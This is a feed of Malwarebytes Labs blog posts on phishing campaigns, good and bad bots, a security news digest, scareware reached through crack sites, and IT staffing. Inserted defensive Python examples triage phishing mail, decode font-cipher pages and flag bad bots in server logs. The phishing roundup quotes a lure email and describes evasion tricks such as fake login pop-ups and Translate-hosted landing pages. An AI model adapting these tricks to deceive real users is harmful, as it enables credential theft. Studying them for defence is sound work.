Malware Bytes

Sophisticated phishing: a roundup of noteworthy campaigns

Malware Bytes Security - 6 hours 20 min ago

Phishing is a problem nearly as old as the Internet. Yet, criminals continue to reach into their bag of phishing tricks in 2019 because, in a nutshell, it just works. Dialing into the human psyche and capitalizing on emotions such as fear, anxiety, or plain laziness, phishing attacks are successful because they take aim at our weaknesses and exploit them—in much the same way an exploit kit takes advantage of a vulnerability in a software program.

To understand why phishing attacks continue to work, we look to cutting-edge tactics devised by threat actors to obfuscate their true intentions and capitalize on basic negligence. To that end, we’ve put together a roundup of noteworthy, out-of-the-box phishing campaigns of the last year. Here are the attacks that stood out.

You can’t easily dismiss this one

Myki, makers of the top-rated password manager with the same name, recently discovered a deceptive Facebook phishing scam that is so utterly convincing that it piqued the interest of security researchers.

The hullabaloo began when the company started receiving multiple reports from users that their Myki password manager was refusing to automatically fill a Facebook pop-up window on sites they visited, citing this as a bug.

After further investigation, Myki security researchers realized that it wasn’t a bug, and, in fact, their product was protecting their clients from trusting the purported Facebook pop-up. Below is a video demo of the phishing campaign they were able to unearth and successfully reproduce:

Video demo (Courtesy of Myki)

“[The] Hacker designs a very realistic-looking social login pop-up prompt in HTML,” wrote Antoine Vincent Jebara, Co-founder and CEO of Myki, in a blog post. “The status bar, navigation bar, shadows, and content are perfectly reproduced to look exactly like a legitimate login prompt.”

The fake pop-up looks and feels so real that users can drag and dismiss it just as they could a legitimate pop-up. But while that brings a convincing level of legitimacy to the attack, the pop-up gives the game away once users attempt to drag it outside the page: that can’t happen, because the parts that reach the edge of the browser window simply disappear, revealing that the pop-up is part of the web page itself.

So, the next time you notice that your password manager is acting funny—like, not pre-filling on pop-up windows as you know it’s supposed to—try dragging the pop-up away from your browser. If a section (or mostly all) of it disappears after reaching the browser’s edge, it’s a fake pop-up. Close the page tab immediately!

Phishing by a thousand characters

By any sane standard, a 400- to 1,000-character URL is overkill. Yet this didn’t stop a phisher from using such URLs in a campaign, and not just once but in multiple places within the same phishing email, much to the annoyance of clever recipients.

Screenshot of the kilometric long URL used in the campaign (Courtesy of MyOnlineSecurity)

The extracted URL above was taken from an email purporting to be a notification from the recipient’s email domain, telling them that their account was blacklisted due to multiple login failures. It then instructed recipients to upgrade and verify their email account before the service provider suspends or terminates the account.

No one knows for sure why someone would be crazy enough to attempt this. By now, fraudsters know there are better, more sustainable ways of obfuscating URLs. But alas, hardworking phishers are still out there. It’s not easy copying and pasting all those characters, after all, much less manually typing them out.

Let’s give them an A for effort, shall we? Nevertheless, phishing is no laughing matter, so let’s keep an eye on this one.

(Not) lost in (Google) translation

Online translation services were designed to serve one purpose: translate content from its original language to another. Who would have expected that phishers could use a legitimate Google Translate page as the landing page for users they’re attempting to own?

Screenshot of the phishing email (Courtesy of Akamai)

To: {recipient}
From: Security Accounts <facebook_secur@hotmail[.]com>
Subject: Security Alert
Message body:

Connecting to a new device

A user has just signed in to your Google Account from a new Windows device. We are sending you this email to verify that it is you.

[Consult the activity]

‘Why do this?’ you might wonder. According to Larry Cashdollar, Senior Security Response Engineer from Akamai, in a blog post, “Using Google Translate does some things; it fills the URL (address) bar with lots of random text, but the most important thing visually is that the victim sees a legitimate Google domain. In some cases, this trick will help the criminal bypass endpoint defenses.”

He also noted that this kind of tactic could be accepted by targets without suspicion when viewed on a mobile device, as the phishing email and landing page appear more legitimate. When viewed on a laptop or desktop, however, the flaws of this tactic are glaring.

Cashdollar mentioned that this phishing campaign is a two-pronged attack, in which phishers aimed at harvesting Google credentials first and Facebook credentials next. The fake Facebook login page, mind you, is not hosted on a Google Translate page.

“…it’s highly uncommon to see such an attack target two brands in the same session,” Cashdollar further wrote.

For users to avoid falling for such a phish, Cashdollar has this to say: “The best defense is a good offense. That means taking your time and examining the message fully before taking any actions. Does the “from” address match what you’re expecting? Does the message create a curious sense of urgency, fear, or authority, almost demanding you do something? If so, those are the messages to be suspicious of, and the ones most likely to result in compromised accounts.”
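The checks Cashdollar describes (does the “from” address match the brand in the message, does it push urgency) plus unwrapping of the Google Translate link can be automated for mail triage. This is an added example, not Akamai’s or Malwarebytes’ code; the sample message is constructed from the headers and text shown above, the landing page address is a constructed example.com placeholder, and the wrapped address is taken from the `u` query parameter that Google Translate proxy links carry.

```python
"""Triage checks for the Google Translate-hosted phish described above.

Added example, not Akamai's or Malwarebytes' code. The sample message is
constructed from the headers and text shown in the post; the landing page
address is a constructed example.com placeholder wrapped in a Google Translate
link, the way the campaign wrapped its credential-harvesting page.
"""
import re
from email import message_from_string
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

# Constructed sample: From/Subject/body as shown in the post, link is a placeholder.
SAMPLE_EMAIL = """\
From: Security Accounts <facebook_secur@hotmail.com>
To: recipient@example.net
Subject: Security Alert

Connecting to a new device

A user has just signed in to your Google Account from a new Windows device.
We are sending you this email to verify that it is you.

Consult the activity: https://translate.google.com/translate?sl=auto&tl=en&u=https://accounts-security.example.com/login
"""

# Hosts Google Translate uses to proxy a translated page; the wrapped page
# address travels in the `u` query parameter.
TRANSLATE_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}
# Brands the lure may name, with the domains mail about them should come from.
BRAND_DOMAINS = {"google": ("google.com",), "facebook": ("facebook.com", "facebookmail.com")}
# Words that manufacture the urgency Cashdollar warns about (constructed list).
URGENCY_WORDS = ("verify", "alert", "suspend", "blacklisted", "immediately", "new device")


def unwrap_translate_url(url: str) -> Optional[str]:
    """Return the real address hidden behind a Google Translate proxy link, else None."""
    parsed = urlparse(url)
    if parsed.hostname not in TRANSLATE_HOSTS:
        return None
    wrapped = parse_qs(parsed.query).get("u", [])
    return wrapped[0] if wrapped else None


def sender_domain(from_header: str) -> str:
    """Extract the domain of the address inside `Name <addr>` or a bare address."""
    match = re.search(r"<([^>]+)>", from_header)
    addr = match.group(1) if match else from_header.strip()
    return addr.rsplit("@", 1)[-1].lower()


def brand_sender_mismatch(from_header: str, text: str) -> List[str]:
    """Brands named in the text whose domains the sender does not belong to."""
    domain = sender_domain(from_header)
    lowered = text.lower()
    mismatched = []
    for brand, domains in BRAND_DOMAINS.items():
        if brand in lowered and not any(domain == d or domain.endswith("." + d) for d in domains):
            mismatched.append(brand)
    return mismatched


def triage(raw_message: str) -> Dict[str, object]:
    """Apply the from-address, urgency and Translate-unwrapping checks to one message."""
    msg = message_from_string(raw_message)
    body = msg.get_payload()
    text = f"{msg.get('Subject', '')}\n{body}"
    links = re.findall(r"https?://\S+", body)
    hidden = [target for target in (unwrap_translate_url(u) for u in links) if target]
    mismatch = brand_sender_mismatch(msg.get("From", ""), text)
    urgency = [word for word in URGENCY_WORDS if word in text.lower()]
    return {
        "hidden_targets": hidden,       # where the Translate link really leads
        "brand_mismatch": mismatch,     # brands claimed but not matching the sender
        "urgency_words": urgency,
        "suspicious": bool(hidden or mismatch) and bool(urgency),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```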

Where did the quick brown fox go?

Unfortunately, it was replaced by letters placed where they weren’t supposed to be, so that phishers could hide the source code of their landing page and make it look less suspicious.

This was what our friends at Proofpoint found when they encountered a campaign that leveraged custom font files for decoding and hiding content.

This particular phishing attack started off as an email purporting to originate from a major US bank, and when users clicked the link in the email, they were directed to a convincing replica of the bank’s official page, ready and waiting to receive credential input.

The custom font files (WOFF and WOFF2) implemented a substitution cipher: the letters in the page’s source code were rendered on screen as different letters via direct character substitution, so what users see does not match what is in the source. For example, the text “The quick brown fox…” as seen on the page when rendered with a normal font was “Eht wprcx bivqn fvk…” in the source served with the custom font file.

Screenshot of the woff font file (Courtesy of Proofpoint)

Proofpoint noted that the phishing kit may have been available since May 2018, if not earlier.
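An analyst who captures such a page can recover what the victim saw by treating the one known pair above as a known plaintext. This is an added example, not Proofpoint’s code; the letter map is learned only from “The quick brown fox” versus “Eht wprcx bivqn fvk”, letters outside that pair are left unchanged and reported, and the second test phrase is constructed.

```python
"""Recovering readable text from a phishing page obfuscated with a custom font.

Added example, not Proofpoint's code. The letter map is learned from the one
known pair the post gives ("The quick brown fox" rendered from source text
"Eht wprcx bivqn fvk"); letters outside that pair are left unchanged and
reported, which is the known-plaintext approach an analyst would take on a
captured page before extracting the full map from the font's glyph table.
"""
from typing import Dict, Set, Tuple

# Known pair from the post: what the victim sees versus what the HTML contains.
VISIBLE_TEXT = "The quick brown fox"
SOURCE_TEXT = "Eht wprcx bivqn fvk"


def derive_substitution(visible: str, source: str) -> Dict[str, str]:
    """Learn visible-letter -> source-letter pairs from a known plaintext.

    The mapping is case-insensitive and raises if the pair is inconsistent.
    """
    if len(visible) != len(source):
        raise ValueError("known pair must be the same length")
    mapping: Dict[str, str] = {}
    for v, s in zip(visible.lower(), source.lower()):
        if not v.isalpha():
            if v != s:
                raise ValueError(f"non-letter {v!r} changed to {s!r}")
            continue
        if mapping.setdefault(v, s) != s:
            raise ValueError(f"letter {v!r} maps to both {mapping[v]!r} and {s!r}")
    return mapping


def _apply(text: str, table: Dict[str, str]) -> str:
    """Substitute letters through `table`, preserving case, leaving others as-is."""
    out = []
    for ch in text:
        sub = table.get(ch.lower())
        if sub is None:
            out.append(ch)
        else:
            out.append(sub.upper() if ch.isupper() else sub)
    return "".join(out)


def decode_source(source: str, mapping: Dict[str, str]) -> Tuple[str, Set[str]]:
    """Turn captured page source back into what the victim saw.

    Returns the decoded text and the set of letters no known pair covers yet,
    so the analyst knows which glyphs still need a known-plaintext sample.
    """
    inverse = {s: v for v, s in mapping.items()}
    unknown = {ch.lower() for ch in source if ch.isalpha() and ch.lower() not in inverse}
    return _apply(source, inverse), unknown


if __name__ == "__main__":
    table = derive_substitution(VISIBLE_TEXT, SOURCE_TEXT)
    # Constructed source snippet using only letters the known pair covers.
    decoded, missing = decode_source("Ev chtcx vpi fvix", table)
    print(decoded, "| letters not yet mapped:", sorted(missing))
```

On the page’s sample the learned map swaps letters in pairs (t/e, q/w, u/p, i/r, k/x, o/v), so the same table works in both directions; that is a property of this one sample, not something to assume about every kit.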

To combat this tactic and the others noted in this roundup, users must continue sticking to established safe computing practices, such as not clicking links in suspicious emails and visiting bank websites directly from the browser instead of via a link in an email.

Businesses can also stay on top of less obvious phishing attacks by incorporating them into employee training programs. Any good anti-phishing plan will use techniques currently being used in the wild (whereas the Nigerian Prince, while still out there, is probably not one you still need to train on).

As always, stay safe, and stay informed!

The post Sophisticated phishing: a roundup of noteworthy campaigns appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Good bots, bad bots: friend or foe?

Malware Bytes Security - 9 hours 42 min ago

One of the most talked about technologies online today is the ubiquitous bot. Simultaneously elusive yet also responsible for all of civilisation’s woes, bots are a hot topic of contention. If we went purely by news reports, we’d assume all bots everywhere are evil, and out to get us (or just spreading memes). We’d also assume every single person we ever disagreed with online is a bot. 

It might surprise you to learn that not all bots are bad. You may only hear about the negatives, but they can be a genuine form of assistance for both people at home and in the workplace.

First, let’s pin down exactly what a bot is (and isn’t).

What is a bot?

Good question.

Bots, as we understand them, perform basic or complex tasks at a speed much faster than we humans can. They’re often there to prop up the bits of a process that humans can’t get to, keeping the plates spinning on our behalf.

The ones you’ve probably heard of doing good deeds are search engine web crawlers; chatbots in Skype, Slack, or various forms of instant messaging; and even front-line support bots handling queries for businesses.

The rest? Those could be bad, but their mileage may vary. More areas of business depend upon bots than you may think, and they’re increasingly being used for all manner of tasks. Some benefit people at home, others simply benefit the organisation running them. However they stack up, we’re going to look at some of the more common ones and give you some things to think about. If you’re putting your own bot together, we hope this will help.


Crawlers do exactly what the name suggests: they crawl. They weave their merry way across the Internet, grabbing, analysing, and cataloguing unimaginable amounts of data daily. Without them going about their business, many things we take for granted simply wouldn’t function as well as they do.

For example, search engine crawlers help us to flesh out search engines. If they didn’t do their job and do it well, you might never actually find the thing you were looking for. Search engine crawler stagnation essentially equals the same for your website—stagnation, marooned on an island of “doesn’t live here.” There are some cases where website owners may not want to be crawled, and they can block bot access via the Robots Exclusion Standard.

Robots.txt is a file you can place in your website directory to ask crawlers not to scrape specific content. Essentially, the Robots.txt is itself a form of (ro)bot, politely turning visitors away. Want a specific example? Many people don’t want old versions of their websites recorded for all time. As a result, they may include a line in Robots.txt asking the Internet Archive not to come calling and scrape the content.

Where this method often goes wrong is that the polite turn away is exactly that—too polite.

Rules: meant to be broken

When the bad bots show up, they’re likely to ignore the “we’re full, sorry” notice and just throw a chair through the window. In fact, some security people will suggest not bothering with a Robots.txt at all. The theory is that some rogue entities will deliberately look for it, and then immediately go poking around all the site portions the owner wanted to hide.

“Wait, which bots are the bad bots creeping around the Internet?!” I hear you cry. Well, there are a lot of them, and the poor old Robots.txt file probably won’t be much help here. One of the best ways to tell a bad bot from a good one is to examine its behavior. Bad bot behavior includes:

  • Brute force login attempts
  • Content scraping to steal or mirror content
  • Probing for hidden areas
  • Overloading the website with traffic
  • Vulnerability hunting: looking to exploit outdated apps, plugins, or content management systems

Even if you think your website is up-to-date, the server it runs on may not be, which means the bot issue is likely out of your hands. There’s a lot to contend with for a website admin.

Not all is lost, however. You can make use of a variety of scanning tools to mimic bot behaviour and see which form of bad bottery you’re most susceptible to. At that point, you can apply the correct fix as required.
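Several of the behaviours listed above leave a recognisable trail in an ordinary web server access log, including the “read robots.txt, then poke at exactly what it hides” pattern. The following is an added example, not Malwarebytes’ code; the robots.txt, the log lines and the client addresses (RFC 5737 documentation ranges) are all constructed, and the login path and brute-force threshold are assumptions.

```python
"""Spotting the bad-bot behaviours listed above in a web server access log.

Added example, not Malwarebytes' code. The robots.txt, the log lines and the
client addresses (RFC 5737 documentation ranges) are all constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed robots.txt: two areas the site owner would rather not have crawled.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /old-site/
"""

# Combined Log Format, as written by Apache and nginx with their default formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)


def _line(ip: str, sec: int, method: str, path: str, status: int, agent: str) -> str:
    """Build one constructed log line so the sample stays short."""
    return (f'{ip} - - [18/Feb/2019:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 0 "-" "{agent}"')


# Constructed traffic: a polite crawler, a client that reads robots.txt and then
# probes exactly the paths it lists, and a client hammering the login form.
ACCESS_LOG = "\n".join(
    [_line("203.0.113.5", 1, "GET", "/robots.txt", 200, "ExampleSearchBot/1.0"),
     _line("203.0.113.5", 2, "GET", "/blog/good-bots/", 200, "ExampleSearchBot/1.0"),
     _line("198.51.100.7", 5, "GET", "/robots.txt", 200, "python-requests/2.21.0"),
     _line("198.51.100.7", 6, "GET", "/admin/", 403, "python-requests/2.21.0"),
     _line("198.51.100.7", 7, "GET", "/old-site/backup.zip", 404, "python-requests/2.21.0")]
    + [_line("192.0.2.9", 10 + i, "POST", "/login", 401, "Mozilla/5.0") for i in range(8)]
)


def parse_disallowed(robots_txt: str, agent: str = "*") -> List[str]:
    """Collect the Disallow prefixes that apply to `agent` (default: everyone)."""
    rules: List[str] = []
    applies = False
    in_agent_block = False  # consecutive User-agent lines share one rule group
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            applies = value == agent or (in_agent_block and applies)
            in_agent_block = True
            continue
        in_agent_block = False
        if key == "disallow" and applies and value:
            rules.append(value)
    return rules


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            entries.append(match.groupdict())
    return entries


def classify(entries: List[Dict[str, str]], disallowed: List[str],
             login_path: str = "/login", brute_threshold: int = 5) -> Dict[str, List[str]]:
    """Return {client ip: flags} for clients whose requests look like a bad bot.

    Assumes the log is in chronological order, as a server writes it.
    """
    by_ip: Dict[str, List[Dict[str, str]]] = defaultdict(list)
    for entry in entries:
        by_ip[entry["ip"]].append(entry)
    report: Dict[str, List[str]] = {}
    for ip, requests in by_ip.items():
        flags = set()
        fetched_robots = False
        failed_logins = 0
        for entry in requests:
            if entry["path"] == "/robots.txt":
                fetched_robots = True
            elif any(entry["path"].startswith(prefix) for prefix in disallowed):
                flags.add("probes_disallowed_paths")
                if fetched_robots:
                    flags.add("read_robots_then_ignored_it")
            if (entry["method"] == "POST" and entry["path"] == login_path
                    and entry["status"] in ("401", "403")):
                failed_logins += 1
        if failed_logins >= brute_threshold:
            flags.add("brute_force_login")
        if flags:
            report[ip] = sorted(flags)
    return report


if __name__ == "__main__":
    for ip, flags in classify(parse_log(ACCESS_LOG), parse_disallowed(ROBOTS_TXT)).items():
        print(ip, ", ".join(flags))
```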

Good, bad, or somewhere in-between

For some people, lines may blur a little between good bots and bad ones. The most basic of interactions can produce all manner of knock-on effects. For example:

Imagine your site is attacked by a content scraper, and all your hard work ends up on a cut and paste merchant’s website. Not cool. You then sign up to a copyright detection bot service, which crawls the web in search of your pilfered text. The scammer running the site has a block in its robots.txt file explicitly requesting the copyright sniffer not to come knocking. At this point, the bot is fully justified in ignoring the polite request: it goes in, scans the text, then reports back to base that someone’s been up to no good. Your bot is now breaking the rules, and you’re tainted with justified wrongdoing forever.

Beating the system

Additionally, search engines can be gamed. SEO poisoning, where rogue links are included in results, was a problem for a long time before major providers started clamping down (with variable success). Even so, there are variations on these attempts. And outside of those, you still have the threat of compromised sites giving bad portals a boost.

If your organisation intends to deploy a web-scraping bot of its own, you may want to keep some of these developments in mind. It’s a fine line between helpful and nuisance, and not all rival bots play nice. It only takes a few mishaps with another org’s service or website, and you’ve got a major PR issue to deal with.

Time for a chat?

Chatbots have been around for a long time. The first was ELIZA, created in 1966 by Joseph Weizenbaum. While he considered ELIZA to highlight the superficiality of human/computer interaction, he was surprised at people attributing human emotions to the dialogue. Wind forward a couple of decades, and you have Roman Mazurenko turned into a chatbot for friends and family to interact with after his tragic early death. Years later, the same questions are being asked in terms of where the line is drawn, and whether such interactions are even healthy.

Many people think of chatbots (at least the good ones) as a recent development. However, chatbots have been used for some time for nefarious purposes—the first thing that springs to mind is pornography spam bots asking for credit card details. Quite often, that association is accompanied by thoughts of malware and other shenanigans. Spreading out from forums and old-style chatrooms/IRC to instant messaging platforms and social media, bots have improved in their ability to actually help, instead of pilfering data or infecting machines.

With early bots sporting only limited phrases and becoming the butt of endless “look at me fool this spam bot” jokes, many businesses didn’t bother to invest in bots because the technology wasn’t there. Nowadays, you’ll find decent bot assistance for everything from shopping portals and banking to utility service providers.

Healthy living

Even Microsoft are in on the action at this point, with their Microsoft Healthcare Bot. This allows providers to customise their own AI-driven bot solution and roll it out to customers and clients. Elsewhere, chat-centric health bots are clearly seen as the future of medical assistance, with everything from therapy to simple daily reminders to take your pills. This view may be a little optimistic, as the potential for incorrect diagnosis or faulty advice is there. Integration with household IoT devices known to occasionally glitch out could increase that possibility. However, this is a clear use case for much-maligned bot technology as a force for good.

Fun for all the family?

Chatbots for children and teens are also a big thing now. Many of them are integrated with Facebook Messenger, and will let kids talk some Hearthstone or Marvel, or (for the older bot fans) converse with an AI replica of a dead horror movie character.

Ad fraud

Ad fraud is something that seems to have been around as long as ads themselves. Bots automate the process of clicking ads to provide a bump in income for the person who placed the ad. The more clicks, the more revenue generated. This is most commonly accomplished by infecting as many PCs as possible, then using those PCs to click ads.

There have been many ad fraud trends over the years. One of the biggest I can remember is the rush to profit from high pay-outs on the word “Mesothelioma,” a rare form of cancer related to asbestos. For this, websites hijacked IE users, infected their PCs, and used instant messaging to send bad links while opening the ads in the unaware user’s browser.

Quite sophisticated, and apart from scale and profit, nothing much has changed. Ad fraud is entirely harmful, and often goes hand-in-hand with malvertising and ransomware attacks. These bots were designed to do bad, and they are accomplishing what they were meant to do.

Snipers in commerce land

Let the bidding wars begin! Automated commerce tools are pretty cut and dried. Not everyone wants their web pages crawled, but you aren’t really going to lose out to someone in direct competition over it. Company X may use chatbots and your business doesn’t, but some customers will prefer the human touch and vice-versa. It isn’t going to make or break anything, particularly.

Where sales are concerned though, it’s pretty black and white. Where cash is involved, anything can happen and usually does. It’s a long time since scammers used bots to “buy” from other bots and bump up fake reputations, and that was quickly replaced in popularity by sniper tools.

Sniping tools have been around for a long time, and are somewhat controversial in seller circles. The basic idea is to give the sniper tool access to your eBay account (or any other bidding service), and at the very last moment before a sale ends, it’ll throw in your bid. Rivals are unable to counter because there’s nothing they can do about an automated service working to nanoseconds instead of a human hammering at a keyboard. So is this bad? For the other users, yes. For eBay as a platform, absolutely. Overall? Remains to be seen.

Fending off the bad bidders

Fixed price sales are a bidding bot’s worst enemy, because there’s nothing to gamble. Take it or leave it at the listed price. Some sites will offer a time extension if a last minute bid comes in, which may or may not help ward off the snipers. One of the biggest drawbacks to sniping is you often must hand over login details to the sniping tool. Do you trust it? Is it safe? Can the people who operate the service see your credentials? All of this and more are natural drawbacks to sniping, and could keep your business on top of those grabbing all the best items.

In the digital space of non-tangible goods, bidding and trading also reigns supreme. Sadly, it comes with major risks. Steam, the video game platform juggernaut, offers its own marketplace. There, you can buy all manner of in-game items, cosmetics, game cards, and so on. Some of these items sell for pennies and cents, others fetch hundreds of pounds and dollars.

A short-lived victory

One enterprising individual made a trading bot for the Steam marketplace, and spent some time buying low and selling high across three separate Steam accounts. Ultimately, they amassed game items worth $10,000, which included 2,261 Team Fortress 2 keys.

Valve discovered the botting antics, and subsequently banned all accounts and deleted all the items. Yes, all ten thousand dollars’ worth. This is a clear case of gaming the system and would have also arguably impacted others. While this may have caused a few people to grab some items at a lower price, overall, it’s tough to call this one an example of a good bot (except maybe for the creator).

Bots by any other name

Most of our examples are essentially quite crude bots, living out their days simply sniffing the web or making the occasional product bid. There’s a big push for bots on your devices instead of scouring the web, mostly in the form of personal digital assistants. To a large degree, any regular mobile device does a lot of this anyway (Ahem, hi Siri!). Personalising said tasks and wrapping them up under a friendly interface is the name of the game.

As with other bot types, much of the information you’ll come across online is aimed at the bad stuff. That’s fine—it’s usually easier to spot things getting up to no good than invisible processes ticking along in the background harming nobody. Even so, plugging “mobile bots” into Google brings back nothing but bad bots, mobile game hijacks, scams, and more bad stuff. There are a few hints as to how this new realm of bot may play out as a force for good, including some outside of the mobile world, that illustrate the positive directions botting could move in.

While the word “bot” may never quite shake its negative associations, it’s absolutely worth revisiting and re-evaluating the next time your work colleagues mention a cool new bot program they’ve been assigned. Who knows, you may even give them some helpful suggestions to get the ball rolling.

The post Good bots, bad bots: friend or foe? appeared first on Malwarebytes Labs.


A week in security (February 11 – 17)

Malware Bytes Security - Mon, 02/18/2019 - 11:30am

Last week on Malwarebytes Labs we discussed the return of the sextortion Bitcoin scams, gave you an early overview of the exploit kits of winter 2019, talked about the destruction of the VFEmail service, asked consumers whether they should remove themselves from social media, and for businesses discussed the implementation of an anti-phishing plan and the concept of whole team security to relieve overworked IT departments.

  • Security researchers have found that Intel’s Software Guard Extensions (SGX) don’t live up to their name. In fact they can be used to hide pieces of malware that silently masquerade as normal applications. (Source: The Register)
  • A targeted phishing campaign is underway that states your email has been blacklisted and then asks you to confirm it by entering your credentials. For some reason, this campaign is using phishing links that can contain almost 1,000 characters. (Source: BleepingComputer)
  • Malicious actors have been hacking WordPress websites by exploiting vulnerabilities in a fairly popular plugin called WP Cost Estimation & Payment Forms Builder. Developed by Loopus, the plugin allows WordPress website administrators to create cost calculators and payment forms. (Source: SecurityWeek)
  • The Emotet Trojan, a thorn in the side of financial institutions and your average individual alike, is back with new techniques and an upsurge in attacks. In recent campaigns malicious documents containing Emotet are being distributed via URLs hosted on threat actor-owned infrastructure as well as traditional spam email attachments. (Source: ZDNet)
  • In the weeks leading up to Valentine’s Day 2019, researchers noticed a new form of GandCrab appearing in romance-themed emails. Hackers love the holidays, and Valentine’s Day is no exception. (Source: DarkReading)
  • New research published by the International Computer Science Institute in California suggests that at least 17,000 Android applications are creating permanent records of your online activity for advertising purposes even when you ask for such information to be forgotten. (Source: ZDNet)
  • Microsoft booted eight malicious apps from its official desktop and mobile app store after researchers found the programs surreptitiously mined for Monero cryptocurrency. All these apps were likely developed by the same person or group. (Source: ThreatPost)
  • A new phishing attack bent on stealing Facebook credentials has been spotted – and it’s turning researchers’ heads due to how well it hides its malicious intent. The status bar, navigation bar, shadows and content were perfectly reproduced to look exactly like a legitimate login prompt. (Source: ThreatPost)
  • Jeff Bezos became the most famous and powerful person to claim to be a victim of sextortion, the term often used to describe the otherwise underreported cases of extortion using intimate or sexually explicit photographs or videos. (Source: Wired)
  • Malta’s leading bank resumes operations after cyberheist-induced shutdown. The Bank of Valletta, which went dark for a day after the fraudulent transfers of €13 million, is now looking to get the money back. (Source: WeLiveSecurity)

Stay safe, everyone!

The post A week in security (February 11 – 17) appeared first on Malwarebytes Labs.


Crack hunting: not all it’s cracked up to be

Malware Bytes Security - Mon, 02/18/2019 - 11:00am

People sometimes ask us in the forums if a keygen or software crack is safe to use. Sometimes, these programs do what they say on the tin. Other times, they’re not what they say they are. In this post, I’ll describe what happened when I went crack hunting, and why it is often unsafe to carry out this activity.

Researchers like myself often browse crack and keygen sites because they are known to host many affiliate links to third-party applications, many of which include Potentially Unwanted Programs (PUPs), adware, or worse. Many of these sites also host downloads for malware.

These sources are important to research because users often browse crack and keygen sites looking to get paid software for free. This is a risky practice, though, because the user may end up downloading unwanted software that does more harm than good.

In this case, I was looking for a crack for Windows 10 Pro, since it’s popular software. The crack download itself was actually not a crack, but a file we detect as PUP.Optional.InstallCore.Generic. This “crack” did not run properly on my test machine, most likely because of sandbox sensitivity.

While the “crack” was being downloaded, the download page redirected to a page advertising DriverFix. The advertisement is one of many adverts offered by ad rotators.

I clicked on the link, which in turn opened the following site:

Clicking the “download now” button downloaded the file from the DriverFix site and delivered basic instructions on how to get the program to run.

According to the website, DriverFix is a Windows application that scans your machine to find outdated drivers, and allows users to update those drivers from within the application with one click. So I tried it.

Once the software was installed, it automatically launched, ran a scan, and displayed the results of the scan. Here are results from two different machines. Notice the results show drivers as being “Extremely old.”

This gives users the false idea that their machine has issues that must be fixed. When I expanded the info for my batteries and checked it, there were indeed newer drivers available, though calling my drivers “extremely old” is a bit of a stretch.

When the user attempts to “update all” or update one driver, they are presented with a pricing page to pay for the services to update their drivers.

The user then has the choice to update one driver, update all drivers on their system, or purchase the “family pack,” which will update as many as three PCs. Many users will opt out of purchasing the services at this point.

This is where things get hairy. One does not have to buy new drivers. In my case, all I did was Google the driver description “Microsoft ACPI-compliant control method battery driver Windows 10” and found results right from the Microsoft Update Catalog site.

If this proves to be difficult for the not-so-tech-savvy folk, you can also open Device Manager, expand the driver in question, open the Driver tab, and click “Update Driver.” Microsoft will download the driver your system needs at no cost. Plus, you can be sure it is coming from Microsoft.

If the user decides not to purchase and simply closes DriverFix, eventually they end up with warning messages from DriverFix regarding their outdated drivers when they do anything on their machine that uses the drivers flagged in the initial scan. Below is the notification I received from DriverFix when I was saving a file to my machine.

This is not typical behavior from benign software. This behavior is designed to scare the user into thinking they have severe issues that will only be solved by purchasing services from DriverFix.

This is after the user might have thought they were getting a free product that promised to fix driver issues in one click when they ran into the initial advertisement.

Unless your machine is very old, Microsoft provides compatible drivers, or the computer manufacturer automatically provides driver updates through its own built-in software at no cost.

Between discovery of this program on December 19, 2018 and January 9, 2019, the installer for this product has been detected 3,245 times by Malwarebytes. There have also been 839 reported traces detected as a result of installs during the same time frame.

Malwarebytes blocks the website that hosts DriverFix downloads, and stops the application installer from launching.

We detect the application as PUP.Optional.DriverFix.

If you installed DriverFix, we have instructions on how to remove it or how to add exclusions if you decide to keep it.

As long as sites continue to push cracked software that seems too good to be true (and thus is actually harmful to users), we will continue to detect such programs in order to protect our customers.

And for those looking for the silver bullet software in crack or keygen sites, we suggest making sure you can spot benign programs from those that try to squeeze a few bucks out of unsuspecting users. Exploring these sites is not for the uninitiated—best to stick to tried and true, legitimate versions of software programs instead of risking illegal crack or keygen sites and programs.

The post Crack hunting: not all it’s cracked up to be appeared first on Malwarebytes Labs.


Tackling the shortage in skilled IT staff: whole team security

Malware Bytes Security - Fri, 02/15/2019 - 11:40am

Is your IT department understaffed and overworked, and are you looking for reinforcements in vain? Maybe these hard-to-hire reinforcements can be found within, rather than having to outsource or hire expensive, short-term extra help. While this was usually only done when your own staff was falling too far behind, the shortage of skilled IT staff in the workforce is starting to take its toll, and this is now a viable option for all.

Undoubtedly, there is a person in every group who is more computer-savvy than the others. The one who can solve your problem or answer your question in seconds, when it would take hours, if not days, to get someone from the IT department to look at it. These people shield the IT department from several questions each day, and keep at bay the frustrated end users who had given up asking the overwhelmed crew for help and assistance.

Nevertheless, professionals often frown upon the help given by these helpful troubleshooters on the floor level. How can we ensure that the help given by these often self-appointed volunteers is nothing short of the first-tier support provided by the IT department?

Pros and cons

First of all, make sure that your IT staff is willing to share their responsibilities with people on the work floor. Without their full cooperation, this plan is destined to fail. We can all agree that trained and weathered IT professionals will generally do a much better job than people who have been trained for other jobs. But if you are facing the same problem as most companies and you just can’t hire enough IT professionals, you will probably welcome all the help you can get. And having to rely on a frustrated and overworked IT staff might be worse than letting volunteers who feel recognized and empowered help in any way they can.

On the other hand, “any way they can” might just turn out to be the problem with this solution. It should be made crystal clear when the volunteers are expected to call in the help of the professionals. You do not want to face some catastrophe because one of the benevolent volunteers Googled a half-baked solution for a problem that was reported to them.

This whole-team security strategy fits nicely into the ongoing shift to BYOD, and even Bring Your Own Security (BYOS). Generally speaking, it will make your employees happier, but it takes some planning and attention to make sure it also works for the company as a whole.

BYOD strategy

